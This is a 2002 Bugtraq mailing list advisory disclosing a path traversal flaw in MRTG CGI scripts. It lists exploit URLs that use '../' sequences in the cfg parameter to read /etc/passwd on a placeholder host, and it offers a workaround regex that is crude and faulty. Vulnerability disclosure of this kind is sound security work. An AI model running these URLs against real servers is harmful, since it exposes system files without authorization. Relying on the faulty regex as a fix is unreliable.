Home page logo
/

bugtraq logo Bugtraq mailing list archives

new advisory
From: "UkR-XblP?" <cuctema () ok ru>
Date: Sat, 02 Feb 2002 04:47:29 +0300

---=== UkR Security Team advisory ===--- Name : MRTG CGI script "show files" Vulnerability About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of user submitted -by-browser information, that can show first string of any file of the system where script installed. Workaround : this will help in somewhat : $input =~ s/[(\.\.)|\/]//g;
Author        : UkR-XblP / UkR security team
Exploit : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault